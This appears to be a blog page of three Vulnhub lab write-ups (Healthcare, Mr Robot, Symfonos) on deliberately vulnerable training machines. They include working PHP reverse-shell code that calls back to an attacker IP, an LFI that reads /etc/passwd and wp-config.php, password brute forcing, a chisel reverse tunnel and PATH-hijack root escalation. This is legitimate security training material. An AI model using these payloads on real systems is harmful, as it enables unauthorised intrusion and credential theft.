Sunday, 28 March 2021

Vulnhub Writeup: Healthcare

Vulnhub - Healthcare Writeup

Vulnhub - Healthcare

boot screen

Description

Level: Intermediate

Description:This machine was developed to train the student to think according to the OSCP methodology. Pay attention to each step, because if you lose something you will not reach the goal: to become root in the system.

It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and root.txt.

You can download the box from Vulnhub here.

Initial Scans

nmap -sn 192.168.110.0/24

Server is up on IP 192.168.110.132

sudo autorecon 192.168.110.132

Ports & Services

21/tcp open ProFTPD 1.3.3d
80/tcp open Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))

Strange looking OS!

21/tcp open ProFTPD 1.3.3d

Anonymous login requires a password, hydra not working on initial try

80/tcp open Apache httpd 2.2.17

Always use a big wordlist if you can’t find anything! In this case the only wordlist with the relevant webapp included is directory-list-2.3-big.txt. After running this we find /openemr/ is available.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.110.132 -f

gobuster results

/openemr/

openemr home page

After completing this box, I found that the intended route is a SQL injection at http://192.168.110.132/openemr/interface/login/validateUser.php. Apparently this guide will help with the SQLi

Before I finished the box, I ran a gobuster scan on the /openemr/ folder and found some interesting files. I’m blacklisting 403 responses sice all CGI files return a 403 regardless of if they exist or not.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -u http://192.168.110.132/openemr --status-codes-blacklist 403,404

gobuster openemr

setup.php looks interesting

openemr setup

I tried to go through setup a couple of times unsuccessfully. It appears that there is a flag that is set once setup.php is run that stops it from being run again. In this instance that flag is not set so setup.php can be run to create a new instance with a known admin password bypassing the intended method of SQL Injection.

Snapshot your box at this point so you can rollback and try again.

Creating a new openemr site

Warning this is likely a one shot thing so make sure you have everything typed correctly as even if this fails it sets a setting in an ini which means you cannot try again.

/setup.php may be configured to allow it to run and create a new site allowing you to login to the blank site as an admin and then upload files / run SQLi / command injection etc.

add the new hostname to /etc/hosts so you can connect to the virtual host on the webserver. In this example, I’m using healthcare.vh

connect to /setup.php and enter the new site name

Configure Site Name

Add healthcare.vh to your hosts file for this machine. We’ll create the new host on this virtual host. The machine will check the host header when you connect and direct you to this new site.

Check everything is ready

Have setup create a new DB

Database name cannot have special characters in it. Initially tried the name healthcare.vh which failed. I’ve set both passwords you see here to “healthcare.vh”. Root password is not required.

Set db config

Step 3

OpenEMR Setup Step 3

Step 4

OpenEMR Setup Step 4

Step 5

OpenEMR Setup Step 5

Step 6

OpenEMR Setup Step 6

Complete

OpenEMR Setup Complete

Login at your new site. Use the new URL from hosts file - http://healthcare.vh/openemr/

Can now login

#HackerFace

We're in

Once in, go to Administration > Files, then edit config.php and insert your shell.

edit config.php

Paste in your shell and hit save

Paste Shell

Warning this appears to break the login page! Hopefully only on your new instance though

Set up your listener

nc -lvnp 1998

The shell will be available at http://healthcare.vh/openemr/sites/healthcare.vh/config.php?fshell=true

get shell

Privesc to user

There are a couple of possible users we could look to privesc to. It’s actually not neccessary to privsec to user since the root privsec will work from the apache user.

possible users

I want to use the mysql command to check the content of the original database and see if there are any credentials to steal. In order to use this command we need a propper tty. This will mess up your console while typing, but keep going, it gets better!

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

^Z # Press CTRL+Z

stty size
stty raw -echo
fg

stty rows XX cols XX

Now the shell should look more normal. mysql should work.

tty upgrade

mysql users in original openemr database

After playing around with the database for a while, there is a table found with some usernames and password hashes.

mysql> select id,username,password,pwd_history1,pwd_history2 from users;
+----+----------+------------------------------------------+--------------+--------------+
| id | username | password                                 | pwd_history1 | pwd_history2 |
+----+----------+------------------------------------------+--------------+--------------+
|  1 | admin    | 3863efef9ee2bfbc51ecdca359c6302bed1389e8 | NULL         | NULL         |
|  2 | medical  | ab24aed5a7c4ad45615cd7e0da816eea39e4895d | NULL         | NULL         |
+----+----------+------------------------------------------+--------------+--------------+

After cracking with something like crackstation.net

3863efef9ee2bfbc51ecdca359c6302bed1389e8    sha1    ackbar
ab24aed5a7c4ad45615cd7e0da816eea39e4895d    sha1    medical

medical:medical is valid unix cred

su to medical

user proof is now readable at /home/almirant/user.txt

user proof

Privesc to root

One of the first things I check is to search for SUID and SGID binaries.

find / -perm -4000 -type f 2>/dev/null | xargs ls -la
find / -perm -2000 -type f 2>/dev/null | xargs ls -la

Weird SGID binary

sgid binary

Let’s see what it does…

healthcare binary output

Looks like it’s running some standard linux binaries. Rather than decompile or dissassemble the binary, I just have a guess to see if it’s running the binary without a full path.

echo "/bin/sh" > /tmp/ifconfig
chmod 777 /tmp/ifconfig
PATH=/tmp:/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin /usr/bin/healthcheck

rooted

Yep, looks like it’s a classic relative path vulnerability.

Written with StackEdit.

Sunday, 21 March 2021

Vulnhub Writeup: Mr Robot

vulnhub - Mr. Robot

Vulnhub - Mr Robot

login screen

Description

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

You can download the box from Vulnhub here.

Initial Scans

nmap -sn 192.168.110.0/24

Server is up on IP 192.168.110.130

nmap -A -T4 -v -p 1-65535 -oA /home/htb/htb/192.168.110.130/nmap/allPorts 192.168.110.130

Open Ports

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

80/tcp Apache httpd

homepage

Playing around on the hompage shows a bunch of videos and text based around the Mr. Robot TV series.

  • appears to be running wordpress, has /wp-admin
  • robots.txt contains “key-1-of-3.txt”
  • robots.txt contains “fsociety.dic”

robots.txt

fsociety.dic appears to be a password list.

key-1-of-3.txt is the first proof.

first key

WordPress Scans

Initial scan

wpscan --url http://192.168.110.130 --api-token=<TOKEN> -e u | tee wpscan.log

Enumerate users

 wpscan -e u --url http://192.168.110.130 | tee wpscan-enum-users.log

Brute force - tried with “admin” and “user” since /0000 shows “User’s blog”

 wpscan --passwords ./files/fsocity.dic --usernames user --url http://192.168.110.130 | tee wpscan-brute-user.log

Username brute force

Attempt a login to /wp-login/ then save the request to file “login.req” from burpsuite

Modify the .req file to add FUZZ instead of the username you tried. For some reason this only works through burp suite proxy, I’m yet to work out why.

ffuf -request ./login.req -fr "Invalid username" -w ./fsocity.dic -x "http://127.0.0.1:8080"

enumerating users

Password brute force

Got a valid cred pair:

wpscan --passwords ./files/fsocity.dic --usernames Elliot --url http://192.168.110.130 | tee wpscan-brute-user.log

wpscan brute force

Reverse Shell

Modify the 404.php Template

  • Appearance > Editor
  • 404.php template

Insert your reverse shell php code at the top, here is an example that I used

if (isset($_REQUEST['fshell'])) {
$sock=fsockopen("192.168.110.128",1998);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
};

Update 404 page

Go to a 404 URL eg. http://192.168.110.130/fdshjfds.php?fshell=true

Receive a shell

nc -lvp 1998

Reverse shell

Privesc to robot

looking around home folders, there is what looks to be an md5 password and the 2nd key

md5 password

crack the md5 password at somewhere like crackstation.net

cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

crackstation

To try this password as the robot user, su can be used. In order to run su with this shell, it needs to be upgraded to a proper tty so that password entry can be done. During the following commands the terminal will look messed up, but just keep going!

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color

^Z # Press CTRL+Z

stty size
stty raw -echo
fg

stty rows XX cols XX

Now the shell should look more normal. su should work.

su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

privesc robot

Privesc to bitnamiftp

Exit back from the robot shell to daemon shell, from this user we can read the wp-config.php file.

wp-config file

this contains the bitnamiftp user password. bitnamiftp user doesn’t have a shell in /etc/passwd so we need a modified su command

su bitnamiftp -s /bin/bash

Now we’re ready for root…

Privesc to root

I spent ages enumerating this box, checking the local listening FTP server etc. If you google around, it appears the intended method is to just run nmap as it is a SUID binary. I ended up modifying a mysql exploit to get root.

bitnamiftp user can modify the mysql config file

bitnamiftp@linux:/opt/bitnami/apps/wordpress/htdocs$ ls -al /opt/bitnami/mysql/my.cnf                      
-rw-r--r-- 1 bitnamiftp root 561 Sep 16  2015 /opt/bitnami/mysql/my.cnf

There is an instance of monit running locally on port 2812

local listening ports

monit instance

To surface this as an accessible port on our attacker machine, Download chisel and run the following on the local kali machine.

sudo ./chisel server -p 9002 -reverse

on target

./chisel client 192.168.110.128:9002 R:2812:127.0.0.1:2812 &

Once completed we now have the ability to restart some services on the machine.

monit web interface

monit stop start

mysql version is:

/opt/bitnami/mysql/bin/mysql.bin  Ver 14.14 Distrib 5.6.26, for linux-glibc2.5 (x86_64) using  EditLine wrapper

SQL Exploit

nsfocus

boompig github

So the exploit does loads of stuff that’s not needed for this box. What is needed is to edit your IP into the mysql_hookandroot_lib.c file and then run the python script which will compile a library. You could probably find the gcc command to compile manually but I was dirty and let it do it for me. I ran the python on my local kali machine and uploaded the compiled .so file to the box.

The exploit library spawns a reverse shell to port 6033 on the IP specified.

Once you have the library download it to /dev/shm/lib/mysql_hookandroot_lib.so and I did a chmod 777 on both the lib folder and the mysql_hookandroot_lib.so file to make sure it could be loaded by another user.

Once the file is in place modify the /opt/bitnami/mysql/my.cnf file and add the following line

malloc_lib='/dev/shm/lib/mysql_hookandroot_lib.so'

like this in the [mysqld] section

[mysqld]
basedir=/opt/bitnami/mysql
datadir=/opt/bitnami/mysql/data
port=3306
socket=/opt/bitnami/mysql/tmp/mysql.sock
tmpdir=/opt/bitnami/mysql/tmp
max_allowed_packet=16M
bind-address=0.0.0.0
malloc_lib='/dev/shm/lib/mysql_hookandroot_lib.so'

The file needs to be 644 permissions or mysql won’t start. Learned that the hard way!


Restarting the service using monit causes the library to be loaded and the reverse shell to spawn.

Completed

rooted

Rooting this way kills the database connection for the WordPress site.

database down

Written with StackEdit.

Monday, 15 March 2021

Vulnhub Writeup: Symphonos

Vulnhub - Symphonos.md

Vulnhub - Symfonos: 1

Yet another vulnhub box writeup!

login screen

You can download the VM from Vulnhub

Description

Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell. SHOULD work for both VMware and Virtualbox.

Name: symfonos: 1
Difficulty: Beginner
Tested: VMware Workstation 15 Pro & VirtualBox 6.0
DHCP Enabled
Note: You may need to update your host file for symfonos.local

Initial Scans

Scan the subnet

nmap -sn 192.168.110.0/24

host is up at 192.168.110.155, run some basic scans

autorecon 192.168.110.155

Open Ports

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        syn-ack ttl 64 Postfix smtpd
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

22/tcp - OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

Normal looking banner

nc 192.168.110.155 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6

Check out later

ssh user enumeration doesn’t work on this machine, all results show as valid users.

ssh user enum

more ssh enum

25/tcp - Postfix smtpd

Connecting to the port with netcat takes about 10 seconds. This means that enumeration on this service could take a long time if it’s opening a new connection for each attempt.

The verify method is is available so this can be used for user enumeration.

$ nc 192.168.110.155 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO test.com
250 symfonos.localdomain
VRFY root
252 2.0.0 root
VRFY abnab
550 5.1.1 <abnab>: Recipient address rejected: User unknown in local recipient table

Added root to users.txt

Here is an attempted SMTP user enumeration with a 60 sec timeout since it’s slow to connect

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.110.155 -w 60

Added found (default) users to users.txt

smtp-user-enum scan

hydra seems much quicker at enumerating

hydra smtp-enum://192.168.110.155/vrfy -L /usr/share/seclists/Usernames/Names/malenames-usa-top1000-lower.txt

hydra smtp enumeration

80/tcp - Apache httpd 2.4.25 ((Debian))

Here I did a basic gobuster scan which found very little. Will come back to this service later when there is potentially more information.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.110.155/ -x php,txt,html,htm,bak -o ./root--dirlist-big.log

139/tcp - Samba smbd 3.X - 4.X (workgroup: WORKGROUP) + 445/tcp - Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Some basic smb checks with no credentials / null session

smbclient -L //192.168.110.155
smbmap -H 192.168.110.155 -u '' -p ''

basic smb checks

It looks like the anonymous share can be mapped by a guest user.

Mounting the anonymous share

cd /tmp
mkdir anonymous
sudo mount -t cifs //192.168.110.155/anonymous /tmp/anonymous
cd anonymous/
ls
cat attention.txt

mounting anon share

Contents of attention.txt

Can users please stop using passwords like ‘epidioko’, ‘qwerty’ and ‘baseball’!

Next person I find using one of these passwords will be fired!

-Zeus

Added to passwords.txt

Here, I tried an smb password brute force test with crackmapexec, unfortunately this doesn’t yield valid results. I think this is because guest users are allowed and all tests that crackmapexec tries succeed.

crackmapexec smb 192.168.110.155 -u users.txt -p passwords.txt --continue-on-success

crackmap exec false pos

Using rpcclient enumeration, I found a username - ‘helios’ which I added to users.txt

$ rpcclient -U '' 192.168.110.155
rpcclient $> enumdomusers

rpcclient

Manually “brute forcing” the helios user with the password list works

manual brute force

Mounting the helios share

mkdir /tmp/helios
sudo mount -t cifs -o username=helios,password=qwerty //192.168.110.155/helios /tmp/helios
ls helios/
cd helios/
cat todo.txt
cat research.txt

mount helios

Contents of todo.txt

  1. Binge watch Dexter
  2. Dance
  3. Work on /h3l105

Contents of research.txt

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

/h3l105 wordpress site

Browsing the site at /h3l105 strongly suggests that symfonos.local is the host name for this site, so add I added to /etc/hosts

burp hostname hint

Refreshing the site with the hostname shows the proper content.

helios wordpress site

After running ```wpscan`` there aren’t many leads. Lots of XSS vulnerabilities, but no LFI, RCE, SQL injection etc.

wpscan --url https://symfonos.local/h3l105/ --api-token=<TOKEN HERE> | tee wpscan.log

wpscan

http://symfonos.local/h3l105/wp-content/uploads/ is browseable.

The only post is from username ‘admin’

I tried exporting research.txt to a wordlist by splitting on space, added words without punctuation and specials and ran a brute force using wpscan

wpscan --passwords ./wordlist.txt --usernames admin --url http://symfonos.local/h3l105/ | tee ./web/wpscan-brute-admin.log 

unfortunately doesn’t get a match. At this point I also tried using hashcat to create a custom wordlist using leetspeak since the URL for the WordPress site is in l33tsp34k.

hashcat -a 0 ./wordlist.txt -r /usr/share/hashcat/rules/leetspeak.rule --stdout > /tmp/leetspeak-wordlist.txt

Unfortunately this also didn’t work.

Local File Inclusion (LFI)

At this point I was a bit stuck so I went to google. I got a HINT to include aggressive detection in wpscan.

wpscan --url https://symfonos.local/h3l105/ --api-token=<TOKEN HERE> --plugins-detection AGGRESSIVE | tee wpscan-aggressive.log

wpscan aggressive

This is much more promising. The exploit-db post shows an unauthenticated LFI in count_of_send.php

This works perfectly and allows retrieval of any file the web server user account can access.

curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

working lfi

It also allows downloading php source code with the php://filter wrapper

curl --silent http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/h3l105/wp-config.php | base64 --decode

lfi for wp-config.php

Remote Code Execution

Usually moving from LFI to RCE involves reading a log file. I used my standard list of log files and tried to read any. All of these regular logs such as the Apache webserver log were not readable.

Since the machine is running Postfix, I tried the normal postfix log file locations with no luck. At this point I tried looking around for mail files in case these were readable and luckily /var/mail/helios was valid and readable with the LFI.

mail readable

Great, so now if we can get PHP code into this mail file then we should have remote code execution.

Sending a mail is possible using netcat to the mail server port.

HELO test.com
MAIL FROM: <test@test.com>
RCPT TO: <helios@symfonos.localdomain>
Data
Subject: This is test
<?php phpinfo(); ?>

.

send phpinfo

And now hitting the URL shows phpinfo proving code execution

phpinfo

So now sending a reverse shell should work.

HELO test.com
MAIL FROM: <test@test.com>
RCPT TO: <helios@symfonos.localdomain>
Data
Subject: This is more test
<?php $sock=fsockopen("192.168.110.128",2001);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

.

reverse shell

Hitting the URL provides a shell

shell

Privesc from helios user

Searching for SUID binaries gives us a non-standard binary in /opt/statuscheck

find / -perm -4000 -type f 2>/dev/null | xargs ls -la

found statuscheck binary

statuscheck binary is SUID

It looks like statuscheck just runs a curl command

running statuscheck

Exploiting a SUID binary which runs another command can be done by replacing the path to an attacker controller location before the binary runs. This can be done if the SUID binary or script is running a command without the full path. For example

curl http://localhost

statuscheck is a Linux executable ELF file so we can’t just read in plaintext what it’s doing.

statuscheck elf

Rather than decompiling the binary, I’ll just have a go

cd /home/helios
echo "/bin/sh" > curl
chmod +x curl
PATH=/home/helios:$PATH /opt/statuscheck

rooted

And that’s the box. I learned to always check available options in scanning tools. I had missed the aggressive scan for plugins in wpscan and therefore would not have been able to do this box.

Written with StackEdit.

Azure AD Connect Sync fails with Event ID 6311

Azure AD Connect Sync fails to synchronise with Event ID 6311 Issue ADSync Event ID 6311 in the Application event log The server encounte...